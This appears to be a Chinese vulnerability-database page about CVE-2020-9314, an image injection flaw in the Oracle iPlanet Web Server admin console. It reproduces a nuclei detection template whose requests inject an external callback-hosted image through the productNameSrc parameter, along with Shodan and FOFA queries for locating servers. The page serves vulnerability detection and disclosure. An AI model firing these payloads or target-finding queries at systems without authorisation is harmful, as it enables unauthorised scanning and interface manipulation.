CVE-2020-9314: Oracle iPlanet Web Server 7.0.x - Image Injection

日期: 2026-01-24 | 影响软件: Oracle iPlanet Web Server | POC: 已公开

漏洞描述

Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.

PoC代码[已公开]

id: CVE-2020-9314

info:
  name: Oracle iPlanet Web Server 7.0.x - Image Injection
  author: DhiyaneshDk
  severity: medium
  description: |
    Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.
  impact: |
    Attackers can inject malicious images into the admin console, potentially leading to social engineering, phishing attacks, or interface manipulation.
  remediation: |
    Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.
  reference:
    - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
    - http://seclists.org/fulldisclosure/2020/May/31
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2020-9314
    cwe-id: CWE-79
    epss-score: 0.41294
    epss-percentile: 0.97278
  metadata:
    verified: false
    max-request: 2
    vendor: oracle
    product: iplanet_web_server
    shodan-query: "Oracle-iPlanet-Web-Server"
    fofa-query: app="Oracle-iPlanet-Web-Server"
  tags: cve,cve2020,oracle,iplanet,injection

http:
  - method: GET
    path:
      - "{{BaseURL}}/admingui/version/Version?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"
      - "{{BaseURL}}/admingui/version/Masthead.jsp?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "productNameSrc"
          - "Oracle iPlanet"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 490a0046304402203da2b067ec8f0e43cde82be6438be13653138736f0f90c1316bb9dc8c4d6a5710220093946bbae397a022cb6328a4faafcbd63be8793b23baa0881d2aca4ea9f0332:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-9314.yaml

相关漏洞推荐